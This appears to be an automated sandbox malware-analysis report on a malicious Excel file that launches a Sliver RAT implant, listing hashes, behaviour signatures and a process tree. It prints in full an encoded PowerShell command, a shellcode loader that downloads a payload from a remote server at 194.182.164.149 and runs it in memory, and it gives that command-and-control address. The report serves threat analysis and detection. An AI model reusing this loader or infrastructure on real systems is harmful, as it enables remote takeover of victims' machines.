Analysis
-
max time kernel
58s -
max time network
60s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 21:19
Behavioral task
behavioral1
Sample
dd7bfe767125a34afa55304846fefefaa8f0ea0af79aba9675f5883f8e145ef3.xls
Resource
win7-20240903-en
General
-
Target
dd7bfe767125a34afa55304846fefefaa8f0ea0af79aba9675f5883f8e145ef3.xls
-
Size
46KB
-
MD5
e97afc97d2da6d145efc00d210d60e4c
-
SHA1
59475d809d54df8e563c497fdf3906ad6e59a1bb
-
SHA256
dd7bfe767125a34afa55304846fefefaa8f0ea0af79aba9675f5883f8e145ef3
-
SHA512
cf560e0642b4b2b57ec20a0015d7efbb2e0d4246e542150ad46f6947996a5e3d2488e2dac99fce428a84cd18270a4e8d2ee12c7848813745a47f4a0591375584
-
SSDEEP
768:H4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:YSFsv66g3KnF439NKC54kkGfn+cL2Xd+
Malware Config
Extracted
https://194.182.164.149:8080/fontawesome.woff
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2972 4716 powershell.exe 82 -
Sliver RAT v2 6 IoCs
Processes:
resource yara_rule behavioral2/memory/2972-72-0x00000263DC1E0000-0x00000263DCC5E000-memory.dmp SliverRAT_v2 behavioral2/memory/2972-73-0x00000263DD6E0000-0x00000263DE1C6000-memory.dmp SliverRAT_v2 behavioral2/memory/2972-75-0x00000263DD6E0000-0x00000263DE1C6000-memory.dmp SliverRAT_v2 behavioral2/memory/2972-74-0x00000263DD6E0000-0x00000263DE1C6000-memory.dmp SliverRAT_v2 behavioral2/memory/2972-76-0x00000263DD6E0000-0x00000263DE1C6000-memory.dmp SliverRAT_v2 behavioral2/memory/2972-81-0x00000263DD6E0000-0x00000263DE1C6000-memory.dmp SliverRAT_v2 -
Sliver family
-
Blocklisted process makes network request 26 IoCs
Processes:
powershell.exeflow pid Process 23 2972 powershell.exe 24 2972 powershell.exe 32 2972 powershell.exe 34 2972 powershell.exe 35 2972 powershell.exe 38 2972 powershell.exe 42 2972 powershell.exe 43 2972 powershell.exe 44 2972 powershell.exe 45 2972 powershell.exe 46 2972 powershell.exe 47 2972 powershell.exe 53 2972 powershell.exe 61 2972 powershell.exe 62 2972 powershell.exe 63 2972 powershell.exe 64 2972 powershell.exe 65 2972 powershell.exe 66 2972 powershell.exe 67 2972 powershell.exe 68 2972 powershell.exe 69 2972 powershell.exe 70 2972 powershell.exe 71 2972 powershell.exe 72 2972 powershell.exe 73 2972 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 4716 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 2972 powershell.exe 2972 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2972 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid Process 4716 EXCEL.EXE 4716 EXCEL.EXE 4716 EXCEL.EXE 4716 EXCEL.EXE 4716 EXCEL.EXE 4716 EXCEL.EXE 4716 EXCEL.EXE 4716 EXCEL.EXE 4716 EXCEL.EXE 4716 EXCEL.EXE 4716 EXCEL.EXE 4716 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEpowershell.execsc.exedescription pid Process procid_target PID 4716 wrote to memory of 2972 4716 EXCEL.EXE 86 PID 4716 wrote to memory of 2972 4716 EXCEL.EXE 86 PID 2972 wrote to memory of 2436 2972 powershell.exe 90 PID 2972 wrote to memory of 2436 2972 powershell.exe 90 PID 2436 wrote to memory of 644 2436 csc.exe 91 PID 2436 wrote to memory of 644 2436 csc.exe 91
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\dd7bfe767125a34afa55304846fefefaa8f0ea0af79aba9675f5883f8e145ef3.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m54vc4k4\m54vc4k4.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DBB.tmp" "c:\Users\Admin\AppData\Local\Temp\m54vc4k4\CSCDF90BF6DFFA94704A53AADA44C79BA5D.TMP"4⤵PID:644
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57cff88844fc187ef4a6118ab23b4feef
SHA150206f53d9b04f2574c7542e015d93a1c18b5d84
SHA25672b154376746cab3cd42b9a16110d022dcd24dda7a824b2ade127816cee7885e
SHA5126bf7a48140ee20460109cfe0d1222c9ea2337f8c9dcaaf409f6375cb5b6a9225dda31e2782ae1e6bab69ee72f50c0edb8696f78d4ac553ffe46a796cda0b15fc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD54dab5058d2e2abcaac37d8eb40e8f014
SHA10d18adcf718206e64ad8d104c2ef8d91dd90f450
SHA256a3ddfe647d269664c78705cc411e0e62fdc201be9b19acce6480867936518997
SHA51245925ecd0652bbb3afb904659cc3a02bea60f85822fc31866eb450444e4dbec07ac86961e316245836b0b7a0d66249a7f2a0932188d7051a169319fd544adc43
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD53176cc279e7468a2b8d58b1349e322d4
SHA185128b996341f4ea4a7117812e12d8ba5abdf475
SHA256cd30b18f73d5bae81eff6fe402273554b5b193747572adffd73167e9ab6125e4
SHA5126ace3a1a9c594204d28280cab027ff1e49519f36e3bc3301818dea1c6746f14c4939bf80c342d65e52ee1704187e425ab9a08a98b5bd539438447a23a22bdb2a
-
Filesize
652B
MD599da4d57417369891c977059c9c9a35d
SHA1558b672cad326006ca5c9d644605682045c05996
SHA256c8af18e23cbbd67eab7ac46aa3af7bfb9c19f07353113b935d8fd8a61f59b934
SHA512084d0bc82f66ec542e4aa4d74852715c89a88356f7ca040a2862980194287773dbd2b7ae0e130b1480f3dc3acb1537ef1eb5843e85f022c2c89e152c40717b8c
-
Filesize
631B
MD5f4dd5c682eb7b3b679f084261bfc7c4c
SHA170f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA2562908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA5128f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d
-
Filesize
369B
MD5f7f0fa71c49878b90afd13fbe338d524
SHA14e54ace7507188c8a1afbb110003af7d6e4de47d
SHA256136b4c2f0f5daa066f48019019871880848ce7aea20e9f9039d88e20554e8bda
SHA512351f92704eea2c75bbed28f4b75aacb1e9edfb36ac414a0a196b69ae63c524ea41cd10c1493a8b6ede3906d862033db995f645e79a91c60206ba07bdf4c3052f